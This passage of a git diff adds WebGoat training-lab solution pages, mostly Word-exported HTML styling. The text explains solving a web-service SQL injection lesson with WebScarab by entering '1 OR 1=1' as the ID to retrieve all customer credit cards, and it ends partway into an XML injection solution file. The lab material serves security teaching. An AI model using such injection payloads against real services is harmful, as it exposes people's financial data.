+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform Web Service SQL Injection<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->Web
+Services communicate through the use of SOAP requests. These requests are
+submitted to a web service in an attempt to execute a function defined in the
+web service definition language (WSDL) file. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Check the web
+service description language (WSDL) file and try to obtain multiple customer
+credit card numbers. You will not see the results returned to this screen. When
+you believe you have suceeded, refresh the page and look for the 'green star'.<o:p></o:p></span></p>
+
+<h2><span style='color:windowtext'>Solution:<o:p></o:p></span></h2>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson
+can be solved easily by using a web services tool called SOAPUI. But here you
+will only use WebScarab. Go in WebScarab to the tab “Web Services”. You will
+see a history of invoked web services or WSDL files.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_31" o:spid="_x0000_i1028" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/WsSqlInjection_files/image002.jpg" v:shapes="Picture_x0020_31"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 23</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Open the
+WebGoat WSDL file for this lesson (WsSqlInjection?WSDL) in a new window.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In WebScarab
+you can select this WSDL from the top drop-down box. And WebScarab will parse
+the XML file so you can select the operations to invoke. Then you can enter a
+value for the parameters used to invoke the operation. For example fill out the
+integer 101 for the ID value and click “Execute”. WebScarab will pop-up a basic
+authentication window. Enter guest/guest and click “Ok”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_32"
+ o:spid="_x0000_i1027" type="#_x0000_t75" style='width:314.25pt;height:156pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=419 height=208
+src="/WebGoat/lesson_solutions/WsSqlInjection_files/image004.jpg" v:shapes="Picture_x0020_32"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Basic authentication<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_33"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:275.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=367
+src="/WebGoat/lesson_solutions/WsSqlInjection_files/image006.jpg" v:shapes="Picture_x0020_33"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Webservice Response<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>What happens
+if you change 101 to 1 OR 1=1? Will you get all the credit cards?<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Yes </span><span
+style='font-family:Wingdings;mso-ascii-font-family:Arial;mso-hansi-font-family:
+Arial;mso-bidi-font-family:Arial;mso-char-type:symbol;mso-symbol-font-family:
+Wingdings'><span style='mso-char-type:symbol;mso-symbol-font-family:Wingdings'>J</span></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_34"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:275.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WsSqlInjection_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=367
+src="/WebGoat/lesson_solutions/WsSqlInjection_files/image008.jpg" v:shapes="Picture_x0020_34"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> All the credit cards<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><u><span
+style='font-family:"Arial","sans-serif"'>Remark:</span></u></b><span
+style='font-family:"Arial","sans-serif"'> when you don’t get any responses you
+might want to select the service and operation again from the drop-down box. A nice
+feature here would be the ability to make a raw SOAP request.<o:p></o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/filelist.xml b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/filelist.xml
new file mode 100644
index 000000000..2596e1075
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/filelist.xml
@@ -0,0 +1,14 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../WsSqlInjection.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image002.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image004.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image006.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image008.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image001.png b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image001.png
new file mode 100644
index 000000000..82abbd808
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image002.jpg b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image002.jpg
new file mode 100644
index 000000000..60c86b971
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image002.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image003.png b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image003.png
new file mode 100644
index 000000000..e658bb1b9
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image004.jpg b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image004.jpg
new file mode 100644
index 000000000..cb476bc0d
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image004.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image005.png b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image005.png
new file mode 100644
index 000000000..d1db6bcb8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image006.jpg b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image006.jpg
new file mode 100644
index 000000000..f3e91d5e9
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image006.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image007.png b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image007.png
new file mode 100644
index 000000000..d3bd79b6b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image008.jpg b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image008.jpg
new file mode 100644
index 000000000..50c57e172
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/image008.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WsSqlInjection_files/themedata.thmx b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WsSqlInjection_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/XMLInjection.html b/main/project/WebContent/lesson_solutions/XMLInjection.html
new file mode 100644
index 000000000..eaeac0ac9
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/XMLInjection.html
@@ -0,0 +1,862 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/XMLInjection_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/XMLInjection_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>46</o:TotalTime>
+  <o:Created>2007-07-11T15:01:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:20:00Z</o:LastSaved>
+  <o:Pages>3</o:Pages>
+  <o:Words>282</o:Words>
+  <o:Characters>1609</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>13</o:Lines>
+  <o:Paragraphs>3</o:Paragraphs>
+  <o:CharactersWithSpaces>1888</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/XMLInjection_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/XMLInjection_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
